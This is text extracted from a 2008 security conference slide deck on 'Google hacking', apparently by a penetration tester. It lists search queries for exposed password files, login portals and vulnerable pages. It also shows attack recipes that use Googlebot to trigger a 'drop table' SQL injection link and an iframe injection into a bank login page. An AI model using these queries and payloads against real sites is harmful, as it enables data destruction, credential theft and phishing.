66
Dirty Attacks with Google Hacking Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16 th , 2008

CITEC #CON2-Dirty Attack with Google Hacking

Embed Size (px)

Citation preview

Page 1: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks with Google Hacking

Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008

Page 2: CITEC #CON2-Dirty Attack with Google Hacking

What I’ve done ?!

  Penetration Testing (BlackBox and WhiteBox)

  Security Consultant ( I Hate this job !!)

  Active Security Researcher

  Devoted Hacker

  Exploits and Vulnerabilities Disclosure (CWH Underground)

  Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Bot (Developing) Etc..

  Comments, Feedback ? >> [email protected] !

(Don’t spam mail !! lol)!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

-------------------------------- # w 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26 USER TTY FROM LOGIN@ IDLE JCPU PCPU prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s

Page 3: CITEC #CON2-Dirty Attack with Google Hacking

What is Google Hacking ?!

  It is NOT hacking into Google!! (Hacking Google: Sidejacking, XSS Spreadsheet, etc)

  Google is much more than just a simple search interface and engine.

  Google hacking is the use of a search engine to locate a security vulnerability on the Internet

  Google crawls public websites for information using an automated search and record program called “Googlebot”.

  IRC Bot using Google Hacking to find Vulnerability and Exploits

  Refers to using the Google search engine in an effort to pull sensitive information, such as credit card numbers, out of a poorly constructed Web application !

Dirty Attacks

With

Google hacking

What is Google Hacking? What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

-------------------------------- Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 4: CITEC #CON2-Dirty Attack with Google Hacking

What is Google Hacking ?!

  Johnny Long is the “grandfather” of Google hacking.   His website http://johnny.ihackstuff.com is exclusively

dedicated to Google Hacking and you will find all sorts of cool information there.

  Johnny Long •  Wrote Google Hacking for Penetration Testers; ISBN

1597491764

What is Google Hacking? What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

-------------------------------- Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Dirty Attacks

With

Google hacking

Page 5: CITEC #CON2-Dirty Attack with Google Hacking

What a Hacker Can do with Vulnerable Web ? !

When an attacker knows the sort of vulnerability he !

wants to exploit but has no specific target,  The  Best  Solu-on  is  “Dirty  Google  Search  operators”

  File Inclusion (RFI, LFI)   SQL Injection   Remote Code Execution   Arbitrary Add Admin   Arbitrary File Upload   XSS / XSRF   Directory Listing   Directory Traversal   Source code disclosure   Administrative Login Portals   Web server Information   Reveal Pathnames and Filenames   Social Engineering (Damn !! How do you get my address)

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web? Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 6: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB) !

We call them “googledorks”  :  Inept or foolish people as revealed by Google.  

  Advisories and Vulnerabilities   Error Messages that contain too much information   Files containing usernames and passwords   Footholds and juicy Info   Pages containing login portals   Pages containing network or vulnerability data   Sensitive Directories   Sensitive Online Shopping Info   Vulnerable Files and Servers   Web Server Detection

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB) --------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 7: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB) !

h;p://johnny.ihackstuff.com/ghdb.php.  

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB) --------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 8: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB) !

Pages  containing  login  portals    

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB) --------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 9: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB) !

in-tle:"ColdFusion  Administrator  Login"  

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB) --------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 10: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB) !

“ColdFusion  Administrator  Login"  

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB) --------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 11: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics!

Crawl  Website  Informa-on  with  Caches      

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 12: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics!

Using  Google  as  a  Proxy  Server      

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 13: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics!

Basic  Search  Operators  

  Use the plus sign (+) to force a search for an overly common word

  Use the minus sign (-) to exclude a term from a search

  (|) / OR, admin | administrator   To search for a phrase, supply the phrase

surrounded by double quotes (" ")   A period (.) serves as a single-character wildcard.   An asterisk (*) represents any word - not the

completion of a word, as is traditionally used   Mixed searches, Can involve both phrases and

individual terms

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 14: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Advanced  Search  Operators  

  filetype:   info:   define:   intext:   inurl:   intitle:   inanchor:   link:   site:   stocks:   cache:

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 15: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Website  Informa-on  Gathering  –  “site:www.amazon.com”   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 16: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Subdomains  Gathering  –  “site:amazon.com    –site:www.amazon.com”   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 17: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Website  containing  Error  Message  –  “Error  |  Warning  site:…”   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 18: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Directory  Lis-ng  –  in-tle:index.of  admin   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 19: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Directory  Lis-ng  –  in-tle:index.of  WS_FTP.LOG   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 20: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Web  server  Informa-on  –  in-tle:index.of  “Server  at”   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 21: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Administra-ve  Login  Portals  –  “admin  login”     !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 22: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

File  robots.txt  –  “inurl:robots.txt”     !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 23: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Vulnerable  File  (Robpoll.cgi)  –  “inurl:robpoll.cgi filetype:cgi” !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 24: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

File  containing  password  –  “AutoCreate=TRUE  password=*”!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 25: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

MS  Access  DB  password  –  “inurl:admin  mdb”!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 26: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

MS  Access  DB  password  –  “inurl:admin  mdb”!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 27: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Password  File  –  “index  of  /etc"  passwd !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 28: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators!

Crack  /  Keygen…  –  94FBR  sobware!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators --------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Page 29: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Loca-ng  Exploits  Via  Common  Code  Strings  

  Another way to locate exploit code is to focus on common strings within the source code itself

  One way to do this is to focus on common inclusions or header file references

  For Example, many C programs include the standard input/output library functions, which are references by an include statement such as #include <stdio.h> within the source code

  A query like this would locate C source code that contained the word exploit, regardless of the file’s extension:      

“#include  <stdio.h>”  exploit  

Page 30: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Loca-ng  Exploits  Via  Common  Code  Strings  

Page 31: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Loca-ng  Exploits  Via  Common  Code  Strings  

Page 32: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Loca-ng  Targets  Via  Demonstra-on  Pages  

  Develop a query string to locate vulnerable targets on the Web; the vendor’s Website is a good place to discover what exactly the product’s Web pages look like

  For Example, some administrators might modify the format of a vendor-supplied Web page to fit the theme of the site

  These types of modifications can impact the effectiveness of a Google search that targets a vendor-supplied page format

  You can find that most sites look very similar and that nearly every site has a “Powered by” message at the bottom of the main page          

Page 33: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Loca-ng  Targets  Via  Source  Code  

  A hacker might use the source code of a program to discover ways to search for that software with Google

  To find the best search string to locate potentially vulnerable targets, you can visit the Web page of the software vendor to find the source code of the offending software

  In case where source code is not available, an attacker might opt to simply download the offending software and run it on a machine he controls to get ideas for potential searches          

Page 34: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Vulnerable  Web  Applica-on  Examples!

Page 35: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Vulnerable  Web  Applica-on  Examples!

Page 36: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

Finding  targets  via  “powered  by”  –  “Powered  By  cubecart”  

Page 37: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Query  for  “Microsob-­‐IIS/5.0  Server  at” !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 38: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!IIS  HTTP/1.1  Error  Page  Titles !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 39: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Query  for  IIS    5.0  –  intext:“404  Object  Not  Found”  Microsob  

IIS/5.0!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 40: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Query  for  “Apache”  “Server  at”  –in-tle:index.of  in-tle:error   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 41: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Apache  2.0  Error  Pages!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 42: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Default  Pages  for  Web  Servers!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 43: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!

Outlook  Web  Access  Default  Portal  –  inurl:“exchange/logon.asp”!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 44: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Windows  Registry  Entries  Can  Reveal  Passwords  –  filetype:reg  

intext:"internet  account  manager"!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 45: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 46: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Error  Message  for  File  Inclusion  –  “Warning:  Failed  opening"   !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 47: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider  

for  ODBC  Drivers  error”     !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 48: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!Error  Message  for  SQL  Injec-on  –  “Microsob  OLE  DB  Provider  

for  ODBC  Drivers  error”     !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 49: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Log Portals, etc..!

Error  Message  for  XSS/XSRF  –  inurl:“error.asp?msg=” !

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc.. Dirty Attacks using Googlebot

Google Hacking Tools --------------------------------

Page 50: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!

Googlebot,  Google’s  Web  Crawler!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

<a href=http://www.mict.go.th>MICT</a>

Page 51: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Google’s  Query  Processor!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

Page 52: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

SQL  Injec-on  via  Googlebot  

We search in Google one of signatures: inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE DB Provider for SQL Server”

Finding the link: http://www.hackme.com/cat.asp?ID=1

Create the file test.html the code is: <html> <a href=“http://www.hackme.com/cat.asp?

ID=1+drop+table+’users’—”>Click Here</a> </html>

Page 53: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

SQL  Injec-on  via  Googlebot  

Then upload to: http://www.mysite.com/test.html After a few days GoogleBot will index the file: http://www.mysite.com/test.html Then index the link “Click Here” inside the file:

http://www.hackme.com/cat.asp?ID=1+drop+table+’users’—

The application SQL query is: SELECT Username FROM users WHERE ID=1

drop table ‘users’— The Result: The table “users” has been deleted,

thanks to Google

Page 54: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Google’s  Query  Processor!

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>

<a href=“http://www.hackeme.com/cat.asp?ID=1+drop+table+’users’—”>Click Here</a>

/cat.asp?ID=1+drop+table+’users’—

Page 55: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot Google Hacking Tools

--------------------------------

Cross  Site  Framing  via  Googlebot  

We search in Google one of signatures: inurl:”.asp?msg=“,inurl:”.asp?title=“,..

We find the link: http://www.CITEC.com/bank/Login.asp?MsgError=Access

denied Create the file 1.html the code is:

<html> <title>CITEC Bank | Login CITEC | CITEC Account</

title> <a href=“http://www.CITEC.com/bank/Login.asp?

MsgError=<iframe src=‘http://www.social.com/2.html’></iframe>”>CITEC Bank</a>

</html>

Page 56: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot!Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

